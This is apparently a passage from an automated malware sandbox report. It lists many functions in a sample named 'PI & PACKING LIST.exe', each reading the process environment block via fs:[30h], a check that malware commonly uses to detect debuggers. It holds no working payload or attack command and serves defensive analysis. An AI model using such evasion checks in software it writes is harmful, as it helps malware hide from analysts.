      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01304015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01304015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01301074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01250050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01250050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012790AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01239080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012358EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01263B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01263B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01305BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01241B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01241B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012ED380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012E23E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012E23E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012E23E3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01274A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01274A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01248A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01235210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01235210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01235210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01235210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01253A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012EB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012EB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01239240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01239240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01239240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01239240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012C4257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012BA537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01273D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B3540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012E3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01257D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012635A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013005AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013005AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012E8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
